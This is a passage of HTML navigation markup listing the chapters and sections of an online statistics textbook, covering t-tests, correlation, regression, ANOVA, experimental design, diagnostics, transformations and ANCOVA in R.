href="two-sample-t-test.html#evaluating-the-assumptions-1"><i class="fa fa-check"></i><b>13.2.2</b> Evaluating the assumptions</a></li> <li class="chapter" data-level="13.2.3" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#what-about-the-equal-variance-assumption"><i class="fa fa-check"></i><b>13.2.3</b> What about the <em>equal variance</em> assumption?</a></li> </ul></li> <li class="chapter" data-level="13.3" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#carrying-out-a-two-sample-t-test-in-r"><i class="fa fa-check"></i><b>13.3</b> Carrying out a two-sample <em>t</em>-test in R</a> <ul> <li class="chapter" data-level="13.3.1" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#visualising-the-data-and-checking-the-assumptions-1"><i class="fa fa-check"></i><b>13.3.1</b> Visualising the data and checking the assumptions</a></li> <li class="chapter" data-level="13.3.2" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#carrying-out-the-test-1"><i class="fa fa-check"></i><b>13.3.2</b> Carrying out the test</a></li> <li class="chapter" data-level="13.3.3" data-path="two-sample-t-test.html"><a href="two-sample-t-test.html#summarising-the-result-1"><i class="fa fa-check"></i><b>13.3.3</b> Summarising the result</a></li> </ul></li> </ul></li> <li class="chapter" data-level="14" data-path="a-correlation-test.html"><a href="a-correlation-test.html"><i class="fa fa-check"></i><b>14</b> A correlation test</a> <ul> <li class="chapter" data-level="14.1" data-path="a-correlation-test.html"><a href="a-correlation-test.html#pearsons-product-moment-correlation"><i class="fa fa-check"></i><b>14.1</b> Pearson’s product-moment correlation</a> <ul> <li class="chapter" data-level="14.1.1" data-path="a-correlation-test.html"><a href="a-correlation-test.html#pearsons-correlation-test"><i class="fa fa-check"></i><b>14.1.1</b> Pearson’s correlation test</a></li> </ul></li> <li class="chapter" data-level="14.2" data-path="a-correlation-test.html"><a href="a-correlation-test.html#pearsons-product-moment-correlation-coefficient-in-r"><i class="fa fa-check"></i><b>14.2</b> Pearson’s product-moment correlation coefficient in R</a> <ul> <li class="chapter" data-level="14.2.1" data-path="a-correlation-test.html"><a href="a-correlation-test.html#visualising-the-data-and-checking-the-assumptions-2"><i class="fa fa-check"></i><b>14.2.1</b> Visualising the data and checking the assumptions</a></li> <li class="chapter" data-level="14.2.2" data-path="a-correlation-test.html"><a href="a-correlation-test.html#doing-the-test"><i class="fa fa-check"></i><b>14.2.2</b> Doing the test</a></li> <li class="chapter" data-level="14.2.3" data-path="a-correlation-test.html"><a href="a-correlation-test.html#reporting-the-result"><i class="fa fa-check"></i><b>14.2.3</b> Reporting the result</a></li> </ul></li> <li class="chapter" data-level="14.3" data-path="a-correlation-test.html"><a href="a-correlation-test.html#next-steps"><i class="fa fa-check"></i><b>14.3</b> Next steps</a></li> </ul></li> <li class="part"><span><b>IV Regression and ANOVA</b></span></li> <li class="chapter" data-level="15" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html"><i class="fa fa-check"></i><b>15</b> Relationships and regression</a> <ul> <li class="chapter" data-level="15.1" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#introduction-1"><i class="fa fa-check"></i><b>15.1</b> Introduction</a></li> <li class="chapter" data-level="15.2" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#what-does-linear-regression-do"><i class="fa fa-check"></i><b>15.2</b> What does linear regression do?</a></li> <li class="chapter" data-level="15.3" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#how-does-simple-linear-regression-work"><i class="fa fa-check"></i><b>15.3</b> How does simple linear regression work?</a> <ul> <li class="chapter" data-level="15.3.1" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#finding-the-best-fit-line"><i class="fa fa-check"></i><b>15.3.1</b> Finding the best fit line</a></li> </ul></li> <li class="chapter" data-level="15.4" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#what-do-you-get-out-of-a-regression"><i class="fa fa-check"></i><b>15.4</b> What do you get out of a regression?</a> <ul> <li class="chapter" data-level="15.4.1" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#interpreting-a-regression"><i class="fa fa-check"></i><b>15.4.1</b> Interpreting a regression</a></li> <li class="chapter" data-level="15.4.2" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#evaluating-hypotheses-inference"><i class="fa fa-check"></i><b>15.4.2</b> Evaluating hypotheses (‘inference’)</a></li> </ul></li> <li class="chapter" data-level="15.5" data-path="relationships-and-regression.html"><a href="relationships-and-regression.html#correlation-or-regression"><i class="fa fa-check"></i><b>15.5</b> Correlation or regression?</a></li> </ul></li> <li class="chapter" data-level="16" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html"><i class="fa fa-check"></i><b>16</b> Simple regression in R</a> <ul> <li class="chapter" data-level="16.1" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#regression-in-R"><i class="fa fa-check"></i><b>16.1</b> Carrying out a simple linear regression in R</a></li> <li class="chapter" data-level="16.2" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#first-steps"><i class="fa fa-check"></i><b>16.2</b> First steps</a> <ul> <li class="chapter" data-level="16.2.1" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#visualising-the-data"><i class="fa fa-check"></i><b>16.2.1</b> Visualising the data</a></li> </ul></li> <li class="chapter" data-level="16.3" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#model-fitting-and-significance-tests"><i class="fa fa-check"></i><b>16.3</b> Model fitting and significance tests</a> <ul> <li class="chapter" data-level="16.3.1" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#extracting-a-little-more-information"><i class="fa fa-check"></i><b>16.3.1</b> Extracting a little more information</a></li> </ul></li> <li class="chapter" data-level="16.4" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#present-results"><i class="fa fa-check"></i><b>16.4</b> Presenting results</a> <ul> <li class="chapter" data-level="16.4.1" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#plotting-the-fitted-line-and-the-data"><i class="fa fa-check"></i><b>16.4.1</b> Plotting the fitted line and the data</a></li> </ul></li> <li class="chapter" data-level="16.5" data-path="simple-regression-in-r.html"><a href="simple-regression-in-r.html#regression-causation"><i class="fa fa-check"></i><b>16.5</b> What about causation?</a></li> </ul></li> <li class="chapter" data-level="17" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html"><i class="fa fa-check"></i><b>17</b> Introduction to one-way ANOVA</a> <ul> <li class="chapter" data-level="17.1" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#intro"><i class="fa fa-check"></i><b>17.1</b> Introduction</a></li> <li class="chapter" data-level="17.2" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#why-do-we-need-anova-models"><i class="fa fa-check"></i><b>17.2</b> Why do we need ANOVA models?</a></li> <li class="chapter" data-level="17.3" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#how-does-anova-work"><i class="fa fa-check"></i><b>17.3</b> How does ANOVA work?</a> <ul> <li class="chapter" data-level="17.3.1" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#degrees-of-freedom"><i class="fa fa-check"></i><b>17.3.1</b> Degrees of freedom</a></li> <li class="chapter" data-level="17.3.2" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#mean-squares-variance-ratios-and-f-tests"><i class="fa fa-check"></i><b>17.3.2</b> Mean squares, variance ratios, and F-tests</a></li> </ul></li> <li class="chapter" data-level="17.4" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#different-kinds-of-anova-model"><i class="fa fa-check"></i><b>17.4</b> Different kinds of ANOVA model</a></li> <li class="chapter" data-level="17.5" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#questions"><i class="fa fa-check"></i><b>17.5</b> Some common questions about ANOVA</a> <ul> <li class="chapter" data-level="17.5.1" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#can-anova-only-be-applied-to-experimental-data"><i class="fa fa-check"></i><b>17.5.1</b> Can ANOVA only be applied to experimental data?</a></li> <li class="chapter" data-level="17.5.2" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#do-we-need-equal-replication"><i class="fa fa-check"></i><b>17.5.2</b> Do we need equal replication?</a></li> <li class="chapter" data-level="17.5.3" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#can-anova-be-done-with-only-two-treatments"><i class="fa fa-check"></i><b>17.5.3</b> Can ANOVA be done with only two treatments?</a></li> </ul></li> </ul></li> <li class="chapter" data-level="18" data-path="one-way-anova-in-r.html"><a href="one-way-anova-in-r.html"><i class="fa fa-check"></i><b>18</b> One-way ANOVA in R</a> <ul> <li class="chapter" data-level="18.1" data-path="one-way-anova-in-r.html"><a href="one-way-anova-in-r.html#introduction-2"><i class="fa fa-check"></i><b>18.1</b> Introduction</a></li> <li class="chapter" data-level="18.2" data-path="one-way-anova-in-r.html"><a href="one-way-anova-in-r.html#factors-in-r"><i class="fa fa-check"></i><b>18.2</b> Factors in R</a></li> <li class="chapter" data-level="18.3" data-path="one-way-anova-in-r.html"><a href="one-way-anova-in-r.html#visualising-the-data-1"><i class="fa fa-check"></i><b>18.3</b> Visualising the data</a></li> <li class="chapter" data-level="18.4" data-path="one-way-anova-in-r.html"><a href="one-way-anova-in-r.html#fitting-the-anova-model"><i class="fa fa-check"></i><b>18.4</b> Fitting the ANOVA model</a></li> <li class="chapter" data-level="18.5" data-path="one-way-anova-in-r.html"><a href="one-way-anova-in-r.html#interpreting-the-results"><i class="fa fa-check"></i><b>18.5</b> Interpreting the results</a></li> <li class="chapter" data-level="18.6" data-path="one-way-anova-in-r.html"><a href="one-way-anova-in-r.html#summarise-results"><i class="fa fa-check"></i><b>18.6</b> Summarising and presenting the results of ANOVA</a></li> </ul></li> <li class="part"><span><b>V Experimental Design</b></span></li> <li class="chapter" data-level="19" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html"><i class="fa fa-check"></i><b>19</b> Principles of experimental design</a> <ul> <li class="chapter" data-level="19.1" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#introduction-3"><i class="fa fa-check"></i><b>19.1</b> Introduction</a></li> <li class="chapter" data-level="19.2" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#jargon-busting"><i class="fa fa-check"></i><b>19.2</b> Jargon busting</a></li> <li class="chapter" data-level="19.3" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#replication"><i class="fa fa-check"></i><b>19.3</b> Replication</a> <ul> <li class="chapter" data-level="19.3.1" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#independence"><i class="fa fa-check"></i><b>19.3.1</b> Independence and pseudoreplication</a></li> </ul></li> <li class="chapter" data-level="19.4" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#controls"><i class="fa fa-check"></i><b>19.4</b> Controls</a></li> <li class="chapter" data-level="19.5" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#confounded-and-noisy-experiments"><i class="fa fa-check"></i><b>19.5</b> Confounded and noisy experiments</a> <ul> <li class="chapter" data-level="19.5.1" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#confounding"><i class="fa fa-check"></i><b>19.5.1</b> Confounding</a></li> <li class="chapter" data-level="19.5.2" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#noise"><i class="fa fa-check"></i><b>19.5.2</b> Noise</a></li> </ul></li> <li class="chapter" data-level="19.6" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#dealing-with-confounding-effects-and-noise"><i class="fa fa-check"></i><b>19.6</b> Dealing with confounding effects and noise</a> <ul> <li class="chapter" data-level="19.6.1" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#randomisation"><i class="fa fa-check"></i><b>19.6.1</b> Randomisation</a></li> <li class="chapter" data-level="19.6.2" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#blocking"><i class="fa fa-check"></i><b>19.6.2</b> Blocking</a></li> <li class="chapter" data-level="19.6.3" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#experimental-control"><i class="fa fa-check"></i><b>19.6.3</b> Experimental control</a></li> <li class="chapter" data-level="19.6.4" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#additional-treatments-designing-in-unwanted-variation"><i class="fa fa-check"></i><b>19.6.4</b> Additional treatments: ‘designing in’ unwanted variation</a></li> </ul></li> <li class="chapter" data-level="19.7" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#ethics-and-practicality"><i class="fa fa-check"></i><b>19.7</b> Ethics and practicality</a></li> <li class="chapter" data-level="19.8" data-path="principles-experimental-design.html"><a href="principles-experimental-design.html#further-reading"><i class="fa fa-check"></i><b>19.8</b> Further reading</a></li> </ul></li> <li class="chapter" data-level="20" data-path="paired-sample-t-test.html"><a href="paired-sample-t-test.html"><i class="fa fa-check"></i><b>20</b> Paired-sample t-test</a> <ul> <li class="chapter" data-level="20.1" data-path="paired-sample-t-test.html"><a href="paired-sample-t-test.html#when-do-we-use-a-paired-sample-t-test"><i class="fa fa-check"></i><b>20.1</b> When do we use a paired-sample <em>t</em>-test?</a></li> <li class="chapter" data-level="20.2" data-path="paired-sample-t-test.html"><a href="paired-sample-t-test.html#why-do-we-use-a-paired-sample-design"><i class="fa fa-check"></i><b>20.2</b> Why do we use a paired-sample design?</a></li> <li class="chapter" data-level="20.3" data-path="paired-sample-t-test.html"><a href="paired-sample-t-test.html#how-do-you-carry-out-a-t-test-on-paired-samples"><i class="fa fa-check"></i><b>20.3</b> How do you carry out a <em>t</em>-test on paired-samples?</a> <ul> <li class="chapter" data-level="20.3.1" data-path="paired-sample-t-test.html"><a href="paired-sample-t-test.html#assumptions-of-the-paired-sample-t-test"><i class="fa fa-check"></i><b>20.3.1</b> Assumptions of the paired-sample <em>t</em>-test</a></li> </ul></li> <li class="chapter" data-level="20.4" data-path="paired-sample-t-test.html"><a href="paired-sample-t-test.html#carrying-out-a-paired-sample-t-test-in-r"><i class="fa fa-check"></i><b>20.4</b> Carrying out a paired-sample <em>t</em>-test in R</a> <ul> <li class="chapter" data-level="20.4.1" data-path="paired-sample-t-test.html"><a href="paired-sample-t-test.html#using-the-paired-true-argument"><i class="fa fa-check"></i><b>20.4.1</b> Using the <code>paired = TRUE</code> argument</a></li> </ul></li> </ul></li> <li class="chapter" data-level="21" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html"><i class="fa fa-check"></i><b>21</b> ANOVA for randomised block designs</a> <ul> <li class="chapter" data-level="21.1" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html#randomized-complete-block-designs"><i class="fa fa-check"></i><b>21.1</b> Randomized Complete Block Designs</a></li> <li class="chapter" data-level="21.2" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html#designs-without-replication"><i class="fa fa-check"></i><b>21.2</b> Designs without replication</a></li> <li class="chapter" data-level="21.3" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html#analysing-an-rcbd-experiment"><i class="fa fa-check"></i><b>21.3</b> Analysing an RCBD experiment</a></li> <li class="chapter" data-level="21.4" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html#carrying-out-the-analysis-with-r"><i class="fa fa-check"></i><b>21.4</b> Carrying out the analysis with R</a> <ul> <li class="chapter" data-level="21.4.1" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html#multiple-comparisons-anyone"><i class="fa fa-check"></i><b>21.4.1</b> Multiple comparisons anyone?</a></li> </ul></li> <li class="chapter" data-level="21.5" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html#are-there-disadvantages-to-randomised-block-designs"><i class="fa fa-check"></i><b>21.5</b> Are there disadvantages to randomised block designs?</a></li> <li class="chapter" data-level="21.6" data-path="anova-for-randomised-block-designs.html"><a href="anova-for-randomised-block-designs.html#multiple-blocking-factors"><i class="fa fa-check"></i><b>21.6</b> Multiple blocking factors</a></li> </ul></li> <li class="part"><span><b>VI Doing More with Models</b></span></li> <li class="chapter" data-level="22" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html"><i class="fa fa-check"></i><b>22</b> Assumptions and diagnostics</a> <ul> <li class="chapter" data-level="22.1" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#understanding-data"><i class="fa fa-check"></i><b>22.1</b> Understanding data</a></li> <li class="chapter" data-level="22.2" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#assumptions-of-regression"><i class="fa fa-check"></i><b>22.2</b> Assumptions of regression</a></li> <li class="chapter" data-level="22.3" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#regres-diagnose"><i class="fa fa-check"></i><b>22.3</b> Regression diagnostics</a> <ul> <li class="chapter" data-level="22.3.1" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#fitted-values"><i class="fa fa-check"></i><b>22.3.1</b> Fitted values</a></li> <li class="chapter" data-level="22.3.2" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#checking-the-linearity-assumption"><i class="fa fa-check"></i><b>22.3.2</b> Checking the linearity assumption</a></li> <li class="chapter" data-level="22.3.3" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#checking-the-normality-assumption"><i class="fa fa-check"></i><b>22.3.3</b> Checking the normality assumption</a></li> <li class="chapter" data-level="22.3.4" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#checking-the-constant-variance-assumption"><i class="fa fa-check"></i><b>22.3.4</b> Checking the constant variance assumption</a></li> </ul></li> <li class="chapter" data-level="22.4" data-path="assumptions-diagnostics.html"><a href="assumptions-diagnostics.html#assumptions-of-one-way-anova"><i class="fa fa-check"></i><b>22.4</b> Assumptions of one-way ANOVA</a></li> </ul></li> <li class="chapter" data-level="23" data-path="regression-diagnostics.html"><a href="regression-diagnostics.html"><i class="fa fa-check"></i><b>23</b> Regression diagnostics in R</a> <ul> <li class="chapter" data-level="23.1" data-path="regression-diagnostics.html"><a href="regression-diagnostics.html#introduction-4"><i class="fa fa-check"></i><b>23.1</b> Introduction</a></li> <li class="chapter" data-level="23.2" data-path="regression-diagnostics.html"><a href="regression-diagnostics.html#diagnostics-for-regression"><i class="fa fa-check"></i><b>23.2</b> Diagnostics for regression</a></li> <li class="chapter" data-level="23.3" data-path="regression-diagnostics.html"><a href="regression-diagnostics.html#diagnostics-for-one-way-anova"><i class="fa fa-check"></i><b>23.3</b> Diagnostics for one-way ANOVA</a> <ul> <li class="chapter" data-level="23.3.1" data-path="regression-diagnostics.html"><a href="regression-diagnostics.html#aside-formal-test-of-equality-of-variance"><i class="fa fa-check"></i><b>23.3.1</b> Aside: formal test of equality of variance</a></li> </ul></li> </ul></li> <li class="chapter" data-level="24" data-path="data-transformations.html"><a href="data-transformations.html"><i class="fa fa-check"></i><b>24</b> Data transformations</a> <ul> <li class="chapter" data-level="24.1" data-path="data-transformations.html"><a href="data-transformations.html#transforms-introduction"><i class="fa fa-check"></i><b>24.1</b> Data that violate ANOVA assumptions</a></li> <li class="chapter" data-level="24.2" data-path="data-transformations.html"><a href="data-transformations.html#ant-eg"><i class="fa fa-check"></i><b>24.2</b> Data transformation: ANOVAs and <em>t</em>-tests</a> <ul> <li class="chapter" data-level="24.2.1" data-path="data-transformations.html"><a href="data-transformations.html#the-dataforaging-in-ants"><i class="fa fa-check"></i><b>24.2.1</b> The data—foraging in ants</a></li> <li class="chapter" data-level="24.2.2" data-path="data-transformations.html"><a href="data-transformations.html#fit-the-model-and-checking-the-assumptions"><i class="fa fa-check"></i><b>24.2.2</b> Fit the model and checking the assumptions</a></li> </ul></li> <li class="chapter" data-level="24.3" data-path="data-transformations.html"><a href="data-transformations.html#carry-on"><i class="fa fa-check"></i><b>24.3</b> Carrying on anyway</a></li> <li class="chapter" data-level="24.4" data-path="data-transformations.html"><a href="data-transformations.html#transform"><i class="fa fa-check"></i><b>24.4</b> Transforming the data</a> <ul> <li class="chapter" data-level="24.4.1" data-path="data-transformations.html"><a href="data-transformations.html#the-logarithmic-transformation"><i class="fa fa-check"></i><b>24.4.1</b> The logarithmic transformation</a></li> <li class="chapter" data-level="24.4.2" data-path="data-transformations.html"><a href="data-transformations.html#presenting-results-from-analyses-of-transformed-data"><i class="fa fa-check"></i><b>24.4.2</b> Presenting results from analyses of transformed data</a></li> </ul></li> <li class="chapter" data-level="24.5" data-path="data-transformations.html"><a href="data-transformations.html#trans-types"><i class="fa fa-check"></i><b>24.5</b> Types of transformations</a> <ul> <li class="chapter" data-level="24.5.1" data-path="data-transformations.html"><a href="data-transformations.html#logarithms"><i class="fa fa-check"></i><b>24.5.1</b> Logarithms</a></li> <li class="chapter" data-level="24.5.2" data-path="data-transformations.html"><a href="data-transformations.html#square-roots"><i class="fa fa-check"></i><b>24.5.2</b> Square roots</a></li> <li class="chapter" data-level="24.5.3" data-path="data-transformations.html"><a href="data-transformations.html#arcsine-square-root"><i class="fa fa-check"></i><b>24.5.3</b> Arcsine square root</a></li> <li class="chapter" data-level="24.5.4" data-path="data-transformations.html"><a href="data-transformations.html#squaring"><i class="fa fa-check"></i><b>24.5.4</b> Squaring</a></li> <li class="chapter" data-level="24.5.5" data-path="data-transformations.html"><a href="data-transformations.html#situations-which-cannot-be-dealt-with-by-transformations"><i class="fa fa-check"></i><b>24.5.5</b> Situations which cannot be dealt with by transformations</a></li> </ul></li> <li class="chapter" data-level="24.6" data-path="data-transformations.html"><a href="data-transformations.html#what-about-other-kinds-of-models"><i class="fa fa-check"></i><b>24.6</b> What about other kinds of models?</a></li> <li class="chapter" data-level="24.7" data-path="data-transformations.html"><a href="data-transformations.html#final-thoughts"><i class="fa fa-check"></i><b>24.7</b> Final thoughts</a></li> </ul></li> <li class="chapter" data-level="25" data-path="multiple-comparison-tests.html"><a href="multiple-comparison-tests.html"><i class="fa fa-check"></i><b>25</b> Multiple comparison tests</a> <ul> <li class="chapter" data-level="25.1" data-path="multiple-comparison-tests.html"><a href="multiple-comparison-tests.html#introduction-5"><i class="fa fa-check"></i><b>25.1</b> Introduction</a></li> <li class="chapter" data-level="25.2" data-path="multiple-comparison-tests.html"><a href="multiple-comparison-tests.html#mult-comp-R"><i class="fa fa-check"></i><b>25.2</b> Tukey’s HSD in R</a></li> <li class="chapter" data-level="25.3" data-path="multiple-comparison-tests.html"><a href="multiple-comparison-tests.html#how-to-summarise-multiple-comparison-results"><i class="fa fa-check"></i><b>25.3</b> How to summarise multiple-comparison results</a></li> <li class="chapter" data-level="25.4" data-path="multiple-comparison-tests.html"><a href="multiple-comparison-tests.html#doing-it-the-easy-way"><i class="fa fa-check"></i><b>25.4</b> Doing it the easy way…</a></li> <li class="chapter" data-level="25.5" data-path="multiple-comparison-tests.html"><a href="multiple-comparison-tests.html#summarise"><i class="fa fa-check"></i><b>25.5</b> Summarising and presenting the results of a Tukey test</a></li> <li class="chapter" data-level="25.6" data-path="multiple-comparison-tests.html"><a href="multiple-comparison-tests.html#significant-anova-but-no-differences-in-a-tukey-test"><i class="fa fa-check"></i><b>25.6</b> Significant ANOVA but no differences in a Tukey test?</a></li> </ul></li> <li class="part"><span><b>VII Beyond Simple Models</b></span></li> <li class="chapter" data-level="26" data-path="two-way-anova-intro.html"><a href="two-way-anova-intro.html"><i class="fa fa-check"></i><b>26</b> Introduction to two-way ANOVA</a> <ul> <li class="chapter" data-level="26.1" data-path="parametric-statistics.html"><a href="parametric-statistics.html#introduction"><i class="fa fa-check"></i><b>26.1</b> Introduction</a></li> <li class="chapter" data-level="26.2" data-path="two-way-anova-intro.html"><a href="two-way-anova-intro.html#degrees-of-freedom-mean-squares-and-f-statistics"><i class="fa fa-check"></i><b>26.2</b> Degrees of freedom, mean squares, and <em>F</em>-statistics</a></li> <li class="chapter" data-level="26.3" data-path="two-way-anova-intro.html"><a href="two-way-anova-intro.html#multiple-comparison-tests-1"><i class="fa fa-check"></i><b>26.3</b> Multiple comparison tests</a></li> <li class="chapter" data-level="26.4" data-path="two-way-anova-intro.html"><a href="two-way-anova-intro.html#beyond-two-way-anova"><i class="fa fa-check"></i><b>26.4</b> Beyond two-way ANOVA</a></li> </ul></li> <li class="chapter" data-level="27" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html"><i class="fa fa-check"></i><b>27</b> Two-way ANOVA in R</a> <ul> <li class="chapter" data-level="27.1" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#introduction-6"><i class="fa fa-check"></i><b>27.1</b> Introduction</a></li> <li class="chapter" data-level="27.2" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#competition-between-calluna-and-festuca"><i class="fa fa-check"></i><b>27.2</b> Competition between <em>Calluna</em> and <em>Festuca</em></a></li> <li class="chapter" data-level="27.3" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#visualising-the-data-2"><i class="fa fa-check"></i><b>27.3</b> Visualising the data</a></li> <li class="chapter" data-level="27.4" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#fitting-the-anova-model-1"><i class="fa fa-check"></i><b>27.4</b> Fitting the ANOVA model</a></li> <li class="chapter" data-level="27.5" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#diagnostics"><i class="fa fa-check"></i><b>27.5</b> Diagnostics</a></li> <li class="chapter" data-level="27.6" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#interpreting-the-results-1"><i class="fa fa-check"></i><b>27.6</b> Interpreting the results</a> <ul> <li class="chapter" data-level="27.6.1" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#understanding-the-model-graphically"><i class="fa fa-check"></i><b>27.6.1</b> Understanding the model graphically</a></li> </ul></li> <li class="chapter" data-level="27.7" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#multiple-comparison-tests-2"><i class="fa fa-check"></i><b>27.7</b> Multiple comparison tests</a></li> <li class="chapter" data-level="27.8" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#drawing-conclusions-and-presenting-results"><i class="fa fa-check"></i><b>27.8</b> Drawing conclusions and presenting results</a> <ul> <li class="chapter" data-level="27.8.1" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#a-little-more-customisation"><i class="fa fa-check"></i><b>27.8.1</b> A little more customisation</a></li> </ul></li> <li class="chapter" data-level="27.9" data-path="two-way-anova-in-r.html"><a href="two-way-anova-in-r.html#balanced-or-orthogonal-designs"><i class="fa fa-check"></i><b>27.9</b> Balanced or orthogonal designs</a></li> </ul></li> <li class="chapter" data-level="28" data-path="introduction-to-ancova.html"><a href="introduction-to-ancova.html"><i class="fa fa-check"></i><b>28</b> Introduction to ANCOVA</a> <ul> <li class="chapter" data-level="28.1" data-path="parametric-statistics.html"><a href="parametric-statistics.html#introduction"><i class="fa fa-check"></i><b>28.1</b> Introduction</a></li> <li class="chapter" data-level="28.2" data-path="introduction-to-ancova.html"><a href="introduction-to-ancova.html#why-do-we-need-ancova-models"><i class="fa fa-check"></i><b>28.2</b> Why do we need ANCOVA models?</a></li> <li class="chapter" data-level="28.3" data-path="introduction-to-ancova.html"><a href="introduction-to-ancova.html#how-does-ancova-work"><i class="fa fa-check"></i><b>28.3</b> How does ANCOVA work?</a></li> <li class="chapter" data-level="28.4" data-path="introduction-to-ancova.html"><a href="introduction-to-ancova.html#degrees-of-freedom-mean-squares-and-f-statistics-1"><i class="fa fa-check"></i><b>28.4</b> Degrees of freedom, mean squares and F-statistics</a></li> <li class="chapter" data-level="28.5" data-path="introduction-to-ancova.html"><a href="introduction-to-ancova.html#assumptions-of-ancova"><i class="fa fa-check"></i><b>28.5</b> Assumptions of ANCOVA</a></li> </ul></li> <li class="chapter" data-level="29" data-path="two-way-ancova-in-r.html"><a href="two-way-ancova-in-r.html"><i class="fa fa-check"></i><b>29</b> Two-way ANCOVA in R</a> <ul> <li class="chapter" data-level="29.1" data-path="two-way-ancova-in-r.html"><a href="two-way-ancova-in-r.html#introduction-7"><i class="fa fa-check"></i><b>29.1</b> Introduction</a></li> <li class="chapter" data-level="29.2" data-path="two-way-ancova-in-r.html"><a href="two-way-ancova-in-r.html#visualising-the-data-3"><i class="fa fa-check"></i><b>29.2</b> Visualising the data</a></li> <li class="chapter" data-level="29.3" data-path="two-way-ancova-in-r.html"><a href="two-way-ancova-in-r.html#fitting-an-ancova"><i class="fa fa-check"></i><b>29.3</b> Fitting an ANCOVA</a></li> <li class="chapter" data-level="29.4" data-path="two-way-ancova-in-r.html"><a href="two-way-ancova-in-r.html#diagnostics-1"><i class="fa fa-check"></i><b>29.4</b> Diagnostics</a></li> <li class="chapter" data-level="29.5" data-path="two-way-ancova-in-r.html"><a href="two-way-ancova-in-r.html#interpreting-the-results-2"><i class="fa fa-check"></i><b>29.5</b> Interpreting the results</a></li> <li class="chapter" data-level="29.6" data-path="two-way-ancova-in-r.html"><a href="two-way-ancova-in-r.html#presenting-the-results"><i class="fa fa-check"></i><b>29.6</b> Presenting the results</a></li> </ul></li> <li class="part"><span><b>VIII Frequency Data and Non-parametric Tests</b></span></li> <li class="chapter" data-level="30" data-path="working-with-frequencies.html"><a href="working-with-frequencies.html"><i class="fa fa-check"></i><b>30</b> Working with frequencies</a> <ul> <li class="chapter" data-level="30.1" data-path="working-with-frequencies.html"><a href="working-with-frequencies.html#introduction-8"><i class="fa fa-check"></i><b>30.1</b> Introduction</a></li> <li class="chapter" data-level="30.2" data-path="working-with-frequencies.html"><a href="working-with-frequencies.html#a-new-kind-of-distribution"><i class="fa fa-check"></i><b>30.2</b> A new kind of distribution</a></li> <li class="chapter" data-level="30.3" 